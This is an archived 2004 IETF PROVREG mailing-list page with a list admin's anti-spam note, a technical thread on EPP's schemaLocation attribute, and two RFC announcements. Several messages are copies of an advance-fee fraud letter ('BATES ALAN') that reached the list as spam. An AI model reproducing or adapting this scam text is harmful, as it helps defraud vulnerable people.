Subject: [ietf-provreg] PROVREG list reconfiguration.

From: Lars-Johan Liman <[email-masked]>
Date: 31 Mar 2004 23:53:16 +0200

Folks,

As the despicable spam morons have started to dive into the Received:
headers to filter out recipient addresses, Majordomo's trick of
"re-sending" to an "unknown" address doesn't work any more. I've tried
to figure out a clean way to make sendmail accept messages to a
certain address only if the client is localhost, but I ended up
"improving" sendmail.cf with a local hack - a hobby that I left behind
many years ago. I will try to convince the Sendmail ppl to accept a
patch for future releases.

This new hack should prevent spammers from bypassing Majordomo
processing, by going for the explosion list directly. It has no means,
however, to know wether a sender address is forged, or not, so the
recent Scott Hollenbeck impersonation (sorry to see that, Scott) thing
is still possible, using a name of any list member. I have no cure for
that, though, except for complete manual list moderation - the work
load of which I dread.

If you see any problems (this is untested software), let me know in
a private mail ASAP.

				Best regards,
				  /Liman
                                  Provreg mail host admin.
#----------------------------------------------------------------------
# There are 10 kinds of people in the world. Those who understand
# binary numbers, and those who don't.
#----------------------------------------------------------------------
# Lars-Johan Liman, M.Sc.	! E-mail: [email-masked]
# Senior Systems Specialist     ! HTTP  : //www.autonomica.se/
# Autonomica AB, Stockholm 	! Voice : +46 8 - 615 85 72
#----------------------------------------------------------------------

To: [email-masked]
Subject: [ietf-provreg] PROVREG list reconfiguration.
From: Lars-Johan Liman <[email-masked]>
Date: 31 Mar 2004 23:53:16 +0200
Lines: 33
Sender: [email-masked]

Folks,

As the despicable spam morons have started to dive into the Received:
headers to filter out recipient addresses, Majordomo's trick of
"re-sending" to an "unknown" address doesn't work any more. I've tried
to figure out a clean way to make sendmail accept messages to a
certain address only if the client is localhost, but I ended up
"improving" sendmail.cf with a local hack - a hobby that I left behind
many years ago. I will try to convince the Sendmail ppl to accept a
patch for future releases.

This new hack should prevent spammers from bypassing Majordomo
processing, by going for the explosion list directly. It has no means,
however, to know wether a sender address is forged, or not, so the
recent Scott Hollenbeck impersonation (sorry to see that, Scott) thing
is still possible, using a name of any list member. I have no cure for
that, though, except for complete manual list moderation - the work
load of which I dread.

If you see any problems (this is untested software), let me know in
a private mail ASAP.

				Best regards,
				  /Liman
                                  Provreg mail host admin.
#----------------------------------------------------------------------
# There are 10 kinds of people in the world. Those who understand
# binary numbers, and those who don't.
#----------------------------------------------------------------------
# Lars-Johan Liman, M.Sc.	! E-mail: [email-masked]
# Senior Systems Specialist     ! HTTP  : //www.autonomica.se/
# Autonomica AB, Stockholm 	! Voice : +46 8 - 615 85 72
#----------------------------------------------------------------------

Reply-To: "spammotel" <[email-masked]>
From: "spammotel" <[email-masked]>
To: <[email-masked]>
Cc: <[email-masked]>, <[email-masked]>
Subject: SPAM to the Internet Engineeing Task Force (IETF) list
Date: Wed, 31 Mar 2004 21:04:07 +0900

This is a multi-part message in MIME format.

------=_NextPart_000_0018_01C41763.B49C7490
Content-Type: text/plain;
	charset="ks_c_5601-1987"
Content-Transfer-Encoding: quoted-printable

HANARO: PLEASE CAN YOU HELP OR CHANGE MY EMAIL ACCOUNT?

I  NOW RECEIVE > 300 SPAM MAILS A DAY, MANY VIA TERRACE
AND HANAFOS/HANANET ACCOUNT

-0000
+0200 (MEST)
Date: Wed, 31 Mar 2004 03:42:23 +0200 (MEST)
Message-Id: <[email-masked]>
Received: from netscape.net ([62.135.107.70])
 (authenticated user [email-masked])
 by sei.mju.edu.cn (sei.mju.edu.cn [127.0.0.1])
 (MDaemon.PRO.v6.8.5.R)
 with ESMTP id 12-md50000000317.tmp
 for <[email-masked]>; Wed, 31 Mar 2004 08:38:43 =
+0800
From: [email-masked]
To: [email-masked]
Subject: REPLY BACK

Dear Friend,

As you read this, I don't want you to feel sorry for me, because, I =
believe everyone will die someday.=20
My name is BATES ALAN a merchant in Dubai, in the U.A.E.I have been =
diagnosed with Esophageal cancer.
It has defiled all forms of medical treatment, and right now I have only =
about a few months to live, according to medical experts.=20
I have not particularly lived my life so well, as I never really cared =
for anyone(not even myself)but my business. Though I am very rich, I was =
never generous, I was always hostile to people and only focused on my =
business as that was the only thing I cared for. But now I regret all =
this as I now know that there is more to life than just wanting to have =
or make all the money in the world.=20
I believe when God gives me a second chance to come to this world I =
would live my life a different way from how I have lived it. Now that =
God has called me, I have willed and given most of my property and =
assets to my immediate and extended family members as well as a few =
close friends.=20
I want God to be merciful to me and accept my soul so, I have decided to =
give alms to charity=20
organizations, as I want this to be one of the last good deeds I do on =
earth. So far, I have distributed money to some charity organizations in =
the U.A.E, Algeria and Malaysia.=20
Now that my health has deteriorated so badly, I cannot do this myself =
anymore. I once asked members of my family to close one of my accounts =
and distribute the money which I have there to charity organization in =
Bulgaria and Pakistan, they refused and kept the money to themselves. =
Hence, I do not trust them anymore, as they seem not to be contended =
with what I have left=20
for them.=20
The last of my money which no one knows of is the huge cash deposit of =
eighteen million dollars $18,000,000,00 that I have with a =
finance/Security Company abroad. I will want you to help me collect this =
deposit and dispatched it to charity organizations.
I have set aside 10% for you and for your time.

God be with you.=20

BATES ALAN

-0000
+0200 (MEST)
Date: Wed, 31 Mar 2004 03:42:23 +0200 (MEST)
Message-Id: <[email-masked]>
Received: from netscape.net ([62.135.107.70])
 (authenticated user [email-masked])
 by sei.mju.edu.cn (sei.mju.edu.cn [127.0.0.1])
 (MDaemon.PRO.v6.8.5.R)
 with ESMTP id 12-md50000000317.tmp
 for <[email-masked]>; Wed, 31 Mar 2004 08:38:43 =
+0800
From: [email-masked]
To: [email-masked]
Subject: REPLY BACK

Dear Friend,

As you read this, I don't want you to feel sorry for me, because, I =
believe everyone will die someday.=20
My name is BATES ALAN a merchant in Dubai, in the U.A.E.I have been =
diagnosed with Esophageal cancer.
It has defiled all forms of medical treatment, and right now I have only =
about a few months to live, according to medical experts.=20
I have not particularly lived my life so well, as I never really cared =
for anyone(not even myself)but my business. Though I am very rich, I was =
never generous, I was always hostile to people and only focused on my =
business as that was the only thing I cared for. But now I regret all =
this as I now know that there is more to life than just wanting to have =
or make all the money in the world.=20
I believe when God gives me a second chance to come to this world I =
would live my life a different way from how I have lived it. Now that =
God has called me, I have willed and given most of my property and =
assets to my immediate and extended family members as well as a few =
close friends.=20
I want God to be merciful to me and accept my soul so, I have decided to =
give alms to charity=20
organizations, as I want this to be one of the last good deeds I do on =
earth. So far, I have distributed money to some charity organizations in =
the U.A.E, Algeria and Malaysia.=20
Now that my health has deteriorated so badly, I cannot do this myself =
anymore. I once asked members of my family to close one of my accounts =
and distribute the money which I have there to charity organization in =
Bulgaria and Pakistan, they refused and kept the money to themselves. =
Hence, I do not trust them anymore, as they seem not to be contended =
with what I have left=20
for them.=20
The last of my money which no one knows of is the huge cash deposit of =
eighteen million dollars $18,000,000,00 that I have with a =
finance/Security Company abroad. I will want you to help me collect this =
deposit and dispatched it to charity organizations.
I have set aside 10% for you and for your time.

God be with you.=20

BATES ALAN

------=_NextPart_000_0018_01C41763.B49C7490
Content-Type: text/html;
	charset="ks_c_5601-1987"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Dks_c_5601-1987">
<META content=3D"MSHTML 6.00.2800.1400" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV align=3Dcenter><FONT face=3DArial color=3D#800080 =
size=3D2><STRONG>HANARO: PLEASE=20
CAN YOU HELP OR CHANGE MY EMAIL ACCOUNT?<BR><BR>I&nbsp; NOW RECEIVE &gt; =
300=20
SPAM MAILS A DAY, MANY VIA TERRACE</STRONG></FONT></DIV>
<DIV align=3Dcenter><FONT face=3DArial color=3D#800080 =
size=3D2><STRONG>AND=20
HANAFOS/HANANET ACCOUNT</STRONG></FONT></DIV>
<DIV align=3Dcenter><FONT face=3DArial color=3D#800080=20
size=3D2><STRONG></STRONG></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Return-Path: &lt;<A=20
href=3D"mailto:[email-masked]">[email-masked]</A>&gt;=
<BR>Received:=20
from [198.41.1.56] (<A=20
href=3D"mailto:[email-masked]">[email-masked]</A>) =
by=20
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
mh08.hanafos.com=20
(Terrace MailWatcher) =
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
with ESMTP id=20
2004033110:49:19:834363.2114.63<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;=20
for &lt;<A =
href=3D"mailto:[email-masked]">[email-masked]</A>&gt;;=20
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Wed, 31 Mar =
2004=20
10:49:19 +0900 (KST) <BR>Received: (qmail 7267 invoked by uid 1004); =
Wed, 31 Mar=20
2004 01:53:55 -0000<BR>Delivered-To: <A=20
href=3D"mailto:[email-masked]">[email-masked]</A><BR>Received: =
(qmail 7262=20
invoked by alias); Wed, 31 Mar 2004 01:53:54 -0000<BR>Received: from =
unknown=20
(HELO nic.cafax.se) (192.71.228.17)<BR>&nbsp; by mx02.nic.name with =
SMTP; Wed,=20
31 Mar 2004 01:53:54 -0000<BR>Received: from sei.mju.edu.cn=20
([218.5.4.187])<BR>&nbsp;by nic.cafax.se (8.12.11/8.12.11) with ESMTP id =

i2V1gNrF001560<BR>&nbsp;for &lt;<A=20
href=3D"mailto:[email-masked]">ietf-provreg-outgoing@=
nic.cafax.se</A>&gt;;=20
Wed, 31 Mar 2004 03:42:24 +0200 (MEST)<BR>Date: Wed, 31 Mar 2004 =
03:42:23 +0200=20
(MEST)<BR>Message-Id: &lt;<A=20
href=3D"mailto:[email-masked]">200403310142.i2V=
[email-masked]</A>&gt;<BR>Received:=20
from netscape.net ([62.135.107.70])<BR>&nbsp;(authenticated user <A=20
href=3D"mailto:[email-masked]">[email-masked]</A>)<BR>&nbsp;b=
y=20
sei.mju.edu.cn (sei.mju.edu.cn=20
[127.0.0.1])<BR>&nbsp;(MDaemon.PRO.v6.8.5.R)<BR>&nbsp;with ESMTP id=20
12-md50000000317.tmp<BR>&nbsp;for &lt;<A=20
href=3D"mailto:[email-masked]">ietf-provreg-outgoing@=
nic.cafax.se</A>&gt;;=20
Wed, 31 Mar 2004 08:38:43 +0800<BR>From: <A=20
href=3D"mailto:[email-masked]">[email-masked]</A>=
<BR>To:=20
<A=20
href=3D"mailto:[email-masked]">ietf-provreg-outgoing@=
nic.cafax.se</A><BR>Subject:=20
REPLY BACK<BR>X-Priority: 3<BR>X-Authenticated-Sender: <A=20
href=3D"mailto:[email-masked]">[email-masked]</A><BR>X-Spam-P=
rocessed:=20
sei.mju.edu.cn, Wed, 31 Mar 2004 08:38:43 +0800<BR>&nbsp;(not processed: =
message=20
from trusted or authenticated source)<BR>X-MDRemoteIP:=20
62.135.107.70<BR>X-Return-Path: BATES <A=20
href=3D"mailto:[email-masked]">[email-masked]</A><BR>X-MDaemon-De=
liver-To:=20
<A=20
href=3D"mailto:[email-masked]">ietf-provreg-outgoing@=
nic.cafax.se</A><BR>X-TERRACE-SPAMMARK:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;=20
(SR:2.87)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Dear Friend,</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>As you read this, I don't want you to =
feel sorry=20
for me, because, I believe everyone will die someday. <BR>My name is =
BATES ALAN=20
a merchant in Dubai, in the U.A.E.I have been diagnosed with Esophageal=20
cancer.<BR>It has defiled all forms of medical treatment, and right now =
I have=20
only about a few months to live, according to medical experts. <BR>I =
have not=20
particularly lived my life so well, as I never really cared for =
anyone(not even=20
myself)but my business. Though I am very rich, I was never generous, I =
was=20
always hostile to people and only focused on my business as that was the =
only=20
thing I cared for. But now I regret all this as I now know that there is =
more to=20
life than just wanting to have or make all the money in the world. <BR>I =
believe=20
when God gives me a second chance to come to this world I would live my =
life a=20
different way from how I have lived it. Now that God has called me, I =
have=20
willed and given most of my property and assets to my immediate and =
extended=20
family members as well as a few close friends. <BR>I want God to be =
merciful to=20
me and accept my soul so, I have decided to give alms to charity=20
<BR>organizations, as I want this to be one of the last good deeds I do =
on=20
earth. So far, I have distributed money to some charity organizations in =
the=20
U.A.E, Algeria and Malaysia. <BR>Now that my health has deteriorated so =
badly, I=20
cannot do this myself anymore. I once asked members of my family to =
close one of=20
my accounts and distribute the money which I have there to charity =
organization=20
in Bulgaria and Pakistan, they refused and kept the money to themselves. =
Hence,=20
I do not trust them anymore, as they seem not to be contended with what =
I have=20
left <BR>for them. <BR>The last of my money which no one knows of is the =
huge=20
cash deposit of eighteen million dollars $18,000,000,00 that I have with =
a=20
finance/Security Company abroad. I will want you to help me collect this =
deposit=20
and dispatched it to charity organizations.<BR>I have set aside 10% for =
you and=20
for your time.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>God be with you. </FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>BATES ALAN</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Return-Path: &lt;<A=20
href=3D"mailto:[email-masked]">[email-masked]</A>&gt;=
<BR>Received:=20
from [198.41.1.56] (<A=20
href=3D"mailto:[email-masked]">[email-masked]</A>) =
by=20
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
mh08.hanafos.com=20
(Terrace MailWatcher) =
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
with ESMTP id=20
2004033110:49:19:834363.2114.63<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;=20
for &lt;<A =
href=3D"mailto:[email-masked]">[email-masked]</A>&gt;;=20
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Wed, 31 Mar =
2004=20
10:49:19 +0900 (KST) <BR>Received: (qmail 7267 invoked by uid 1004); =
Wed, 31 Mar=20
2004 01:53:55 -0000<BR>Delivered-To: <A=20
href=3D"mailto:[email-masked]">xxxxxxxx</A></FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Received: (qmail 7262 invoked by =
alias); Wed, 31=20
Mar 2004 01:53:54 -0000<BR>Received: from unknown (HELO nic.cafax.se)=20
(192.71.228.17)<BR>&nbsp; by mx02.nic.name with SMTP; Wed, 31 Mar 2004 =
01:53:54=20
-0000<BR>Received: from sei.mju.edu.cn ([218.5.4.187])<BR>&nbsp;by =
nic.cafax.se=20
(8.12.11/8.12.11) with ESMTP id i2V1gNrF001560<BR>&nbsp;for &lt;<A=20
href=3D"mailto:[email-masked]">ietf-provreg-outgoing@=
nic.cafax.se</A>&gt;;=20
Wed, 31 Mar 2004 03:42:24 +0200 (MEST)<BR>Date: Wed, 31 Mar 2004 =
03:42:23 +0200=20
(MEST)<BR>Message-Id: &lt;<A=20
href=3D"mailto:[email-masked]">200403310142.i2V=
[email-masked]</A>&gt;<BR>Received:=20
from netscape.net ([62.135.107.70])<BR>&nbsp;(authenticated user <A=20
href=3D"mailto:[email-masked]">[email-masked]</A>)<BR>&nbsp;b=
y=20
sei.mju.edu.cn (sei.mju.edu.cn=20
[127.0.0.1])<BR>&nbsp;(MDaemon.PRO.v6.8.5.R)<BR>&nbsp;with ESMTP id=20
12-md50000000317.tmp<BR>&nbsp;for &lt;<A=20
href=3D"mailto:[email-masked]">ietf-provreg-outgoing@=
nic.cafax.se</A>&gt;;=20
Wed, 31 Mar 2004 08:38:43 +0800<BR>From: <A=20
href=3D"mailto:[email-masked]">[email-masked]</A>=
<BR>To:=20
<A=20
href=3D"mailto:[email-masked]">ietf-provreg-outgoing@=
nic.cafax.se</A><BR>Subject:=20
REPLY BACK<BR>X-Priority: 3<BR>X-Authenticated-Sender: <A=20
href=3D"mailto:[email-masked]">[email-masked]</A><BR>X-Spam-P=
rocessed:=20
sei.mju.edu.cn, Wed, 31 Mar 2004 08:38:43 +0800<BR>&nbsp;(not processed: =
message=20
from trusted or authenticated source)<BR>X-MDRemoteIP:=20
62.135.107.70<BR>X-Return-Path: BATES <A=20
href=3D"mailto:[email-masked]">[email-masked]</A><BR>X-MDaemon-De=
liver-To:=20
<A=20
href=3D"mailto:[email-masked]">ietf-provreg-outgoing@=
nic.cafax.se</A><BR>X-TERRACE-SPAMMARK:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;=20
(SR:2.87)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Dear Friend,</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>As you read this, I don't want you to =
feel sorry=20
for me, because, I believe everyone will die someday. <BR>My name is =
BATES ALAN=20
a merchant in Dubai, in the U.A.E.I have been diagnosed with Esophageal=20
cancer.<BR>It has defiled all forms of medical treatment, and right now =
I have=20
only about a few months to live, according to medical experts. <BR>I =
have not=20
particularly lived my life so well, as I never really cared for =
anyone(not even=20
myself)but my business. Though I am very rich, I was never generous, I =
was=20
always hostile to people and only focused on my business as that was the =
only=20
thing I cared for. But now I regret all this as I now know that there is =
more to=20
life than just wanting to have or make all the money in the world. <BR>I =
believe=20
when God gives me a second chance to come to this world I would live my =
life a=20
different way from how I have lived it. Now that God has called me, I =
have=20
willed and given most of my property and assets to my immediate and =
extended=20
family members as well as a few close friends. <BR>I want God to be =
merciful to=20
me and accept my soul so, I have decided to give alms to charity=20
<BR>organizations, as I want this to be one of the last good deeds I do =
on=20
earth. So far, I have distributed money to some charity organizations in =
the=20
U.A.E, Algeria and Malaysia. <BR>Now that my health has deteriorated so =
badly, I=20
cannot do this myself anymore. I once asked members of my family to =
close one of=20
my accounts and distribute the money which I have there to charity =
organization=20
in Bulgaria and Pakistan, they refused and kept the money to themselves. =
Hence,=20
I do not trust them anymore, as they seem not to be contended with what =
I have=20
left <BR>for them. <BR>The last of my money which no one knows of is the =
huge=20
cash deposit of eighteen million dollars $18,000,000,00 that I have with =
a=20
finance/Security Company abroad. I will want you to help me collect this =
deposit=20
and dispatched it to charity organizations.<BR>I have set aside 10% for =
you and=20
for your time.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>God be with you. </FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>BATES ALAN</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV></BODY></HTML>

------=_NextPart_000_0018_01C41763.B49C7490--

Date: Tue, 30 Mar 2004 22:33:46 -0800 (PST)
From: Rick Wesson <[email-masked]>
To: Andrew Newton <[email-masked]>
Cc: "[email-masked]'" <[email-masked]>
Subject: Re: [ietf-provreg] schemaLocation required?
Sender: [email-masked]

agreed. furthermore in the example given in Section 4.3.2 it states

   ...all schema location information can be declared on the document
   element of a document, if desired, regardless of where the namespaces
   are actually used.

which would mean they could be declared in the <epp> start tag and not
in its chidren.

it is preferable that we agree in the <greeting> and allow the
xsi:schemaLocation to beoptional for the rest of the session.

anyone else have thoughts on this?

-rick

On Tue, 30 Mar 2004, Andrew Newton wrote:

>
> On Mar 30, 2004, at 2:26 PM, Rick Wesson wrote:
> >    is the  xsi:schemaLocation attribute a MUST ot a MAY? the above
> >    language isn't expressly clear about it.
> >
>
> http://www.w3.org/TR/xmlschema-1/#composition-instances
>
> Section 4.3.2, item 3, 2nd paragraph.
>
> My interpretation is 'MAY'.
>
> -andy
>
>

Date: Wed, 31 Mar 2004 03:42:23 +0200 (MEST)
From: [email-masked]
To: [email-masked]
Subject: REPLY BACK

Dear Friend,

As you read this, I don't want you to feel sorry for me, because, I believe everyone will die someday. 
My name is BATES ALAN a merchant in Dubai, in the U.A.E.I have been diagnosed with Esophageal cancer.
It has defiled all forms of medical treatment, and right now I have only about a few months to live, according to medical experts. 
I have not particularly lived my life so well, as I never really cared for anyone(not even myself)but my business. Though I am very rich, I was never generous, I was always hostile to people and only focused on my business as that was the only thing I cared for. But now I regret all this as I now know that there is more to life than just wanting to have or make all the money in the world. 
I believe when God gives me a second chance to come to this world I would live my life a different way from how I have lived it. Now that God has called me, I have willed and given most of my property and assets to my immediate and extended family members as well as a few close friends. 
I want God to be merciful to me and accept my soul so, I have decided to give alms to charity 
organizations, as I want this to be one of the last good deeds I do on earth. So far, I have distributed money to some charity organizations in the U.A.E, Algeria and Malaysia. 
Now that my health has deteriorated so badly, I cannot do this myself anymore. I once asked members of my family to close one of my accounts and distribute the money which I have there to charity organization in Bulgaria and Pakistan, they refused and kept the money to themselves. Hence, I do not trust them anymore, as they seem not to be contended with what I have left 
for them. 
The last of my money which no one knows of is the huge cash deposit of eighteen million dollars $18,000,000,00 that I have with a finance/Security Company abroad. I will want you to help me collect this deposit and dispatched it to charity organizations.
I have set aside 10% for you and for your time.

God be with you. 

BATES ALAN

From: "Hollenbeck, Scott" <[email-masked]>
To: "'Rick Wesson'" <[email-masked]>, "[email-masked]'" <[email-masked]>
Subject: RE: [ietf-provreg] schemaLocation required?
Date: Tue, 30 Mar 2004 15:03:15 -0500
Sender: [email-masked]

> could scott clarifiy his intention with xmlns:xsi and 
> xsi:schemaLocation?

The requirements for use of these attributes are described in the normative
XML and XML Schema references.  Their use (or lack of use) isn't an EPP
requirement.

-Scott-

Date: Tue, 30 Mar 2004 11:26:23 -0800 (PST)
From: Rick Wesson <[email-masked]>
To: "[email-masked]'" <[email-masked]>
Subject: [ietf-provreg] schemaLocation required?
Sender: [email-masked]

in RFC3730 it states...

2.2.  Protocol Identification

   All EPP XML instances MUST begin with an <epp> element.  This element
   identifies the start of an EPP protocol element, the namespace used
   within the protocol, and the location of the protocol schema.  The
   <epp> start element and the associated </epp> ending element MUST be
   applied to all structures sent by both clients and servers.

   Example "start" and "end" EPP elements:

   <epp xmlns="urn:ietf:params:xml:ns:epp-1.0"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="urn:ietf:params:xml:ns:epp-1.0
        epp-1.0.xsd">
   </epp>

My question is:

   is the  xsi:schemaLocation attribute a MUST ot a MAY? the above
   language isn't expressly clear about it.

   Since the xmlns clearly defines what we are talking about and the
   xmlns:xsi and xsi:schemaLocation redundancy remove all the chars
   recovered in the shortning of element names.

These elements cost 119 chars which is more than we recovered in the
element name shorning scheme.

IMHO we should either reduce the requirement (if there is an implied
MUST) for xmlns:xsi and xsi:schemaLocation or use real terms for the
element names insted of shorting them to acronyms.

could scott clarifiy his intention with xmlns:xsi and xsi:schemaLocation?

thanks,

-rick

Date: Tue, 30 Mar 2004 13:29:08 +0200 (MEST)
From: [email-masked]
To: [email-masked]
Subject: REPLY BACK

Dear Friend,

As you read this, I don't want you to feel sorry for me, because, I believe everyone will die someday. 
My name is BATES ALAN a merchant in Dubai, in the U.A.E.I have been diagnosed with Esophageal cancer.
It has defiled all forms of medical treatment, and right now I have only about a few months to live, according to medical experts. 
I have not particularly lived my life so well, as I never really cared for anyone(not even myself)but my business. Though I am very rich, I was never generous, I was always hostile to people and only focused on my business as that was the only thing I cared for. But now I regret all this as I now know that there is more to life than just wanting to have or make all the money in the world. 
I believe when God gives me a second chance to come to this world I would live my life a different way from how I have lived it. Now that God has called me, I have willed and given most of my property and assets to my immediate and extended family members as well as a few close friends. 
I want God to be merciful to me and accept my soul so, I have decided to give alms to charity 
organizations, as I want this to be one of the last good deeds I do on earth. So far, I have distributed money to some charity organizations in the U.A.E, Algeria and Malaysia. 
Now that my health has deteriorated so badly, I cannot do this myself anymore. I once asked members of my family to close one of my accounts and distribute the money which I have there to charity organization in Bulgaria and Pakistan, they refused and kept the money to themselves. Hence, I do not trust them anymore, as they seem not to be contended with what I have left 
for them. 
The last of my money which no one knows of is the huge cash deposit of eighteen million dollars $18,000,000,00 that I have with a finance/Security Company abroad. I will want you to help me collect this deposit and dispatched it to charity organizations.
I have set aside 10% for you and for your time.

God be with you. 

BATES ALAN

To: IETF-Announce: ;
Subject: [ietf-provreg] RFC 3735 on Guidelines for Extending the Extensible Provisioning Protocol (EPP)
Cc: [email-masked], [email-masked]
From: [email-masked]
Date: Fri, 26 Mar 2004 17:36:31 -0800
Sender: [email-masked]

--NextPart

A new Request for Comments is now available in online RFC libraries.

        RFC 3735

        Title:      Guidelines for Extending the Extensible
                    Provisioning Protocol (EPP)
        Author(s):  S. Hollenbeck
        Status:     Informational
        Date:       March 2004
        Mailbox:    [email-masked]
        Pages:      13
        Characters: 27326
        Updates/Obsoletes/SeeAlso:    None

        I-D Tag:    draft-ietf-provreg-epp-ext-03.txt

        URL:        ftp://ftp.rfc-editor.org/in-notes/rfc3735.txt

The Extensible Provisioning Protocol (EPP) is an application layer
client-server protocol for the provisioning and management of objects
stored in a shared central repository.  Specified in XML, the
protocol defines generic object management operations and an
extensible framework that maps protocol operations to objects.  This
document presents guidelines for use of EPP's extension mechanisms to
define new features and object management capabilities.

This document is a product of the Provisioning Registry Working Group
of the IETF.

This memo provides information for the Internet community.  It does
not specify an Internet standard of any kind.  Distribution of this
memo is unlimited.

This announcement is sent to the IETF list and the RFC-DIST list.
Requests to be added to or deleted from the IETF distribution list
should be sent to [email-masked].  Requests to be
added to or deleted from the RFC-DIST distribution list should
be sent to [email-masked].

Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
an EMAIL message to [email-masked] with the message body 
help: ways_to_get_rfcs.  For example:

        To: [email-masked]
        Subject: getting rfcs

        help: ways_to_get_rfcs

Requests for special distribution should be addressed to either the
author of the RFC in question, or to [email-masked].  Unless
specifically noted otherwise on the RFC itself, all RFCs are for
unlimited distribution.echo 
Submissions for Requests for Comments should be sent to
[email-masked].  Please consult RFC 2223, Instructions to RFC
Authors, for further information.

Joyce K. Reynolds and Sandy Ginoza
USC/Information Sciences Institute

..

Below is the data which will enable a MIME compliant Mail Reader 
implementation to automatically retrieve the ASCII version
of the RFCs.

--NextPart
Content-Type: Multipart/Alternative; Boundary="OtherAccess"

--OtherAccess
Content-Type:  Message/External-body;
        access-type="mail-server";
        server="[email-masked]"

Content-Type: text/plain
Content-ID: <[email-masked]>

RETRIEVE: rfc
DOC-ID: rfc3735

--OtherAccess
Content-Type:   Message/External-body;
        name="rfc3735.txt";
        site="ftp.isi.edu";
        access-type="anon-ftp";
        directory="in-notes"

Content-Type: text/plain
Content-ID: <[email-masked]>

--OtherAccess--
--NextPart--

To: IETF-Announce: ;
Subject: [ietf-provreg] RFC 3734 on Extensible Provisioning Protocol (EPP) Transport Over TCP
Cc: [email-masked], [email-masked]
From: [email-masked]
Date: Fri, 26 Mar 2004 17:35:01 -0800
Sender: [email-masked]

--NextPart

A new Request for Comments is now available in online RFC libraries.

        RFC 3734

        Title:      Extensible Provisioning Protocol (EPP) Transport
                    Over TCP
        Author(s):  S. Hollenbeck
        Status:     Standards Track
        Date:       March 2004
        Mailbox:    [email-masked]
        Pages:      9
        Characters: 19550
        Updates/Obsoletes/SeeAlso:    None

        I-D Tag:    draft-ietf-provreg-epp-tcp-06.txt

        URL:        ftp://ftp.rfc-editor.org/in-notes/rfc3734.txt

This document describes how an Extensible Provisioning Protocol (EPP)
session is mapped onto a single Transmission Control Protocol (TCP)
connection.  This mapping requires use of the Transport Layer Security
(TLS) protocol to protect information exchanged between an EPP client
and an EPP server.

This document is a product of the Provisioning Registry Protocol
Working Group of the IETF.

This is now a Proposed Standard Protocol.

This document specifies an Internet standards track protocol for
the Internet community, and requests discussion and suggestions
for improvements.  Please refer to the current edition of the
"Internet Official Protocol Standards" (STD 1) for the
standardization state and status of this protocol.  Distribution
of this memo is unlimited.

This announcement is sent to the IETF list and the RFC-DIST list.
Requests to be added to or deleted from the IETF distribution list
should be sent to [email-masked].  Requests to be
added to or deleted from the RFC-DIST distribution list should
be sent to [email-masked].

Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
an EMAIL message to [email-masked] with the message body 
help: ways_to_get_rfcs.  For example:

        To: [email-masked]
        Subject: getting rfcs

        help: ways_to_get_rfcs

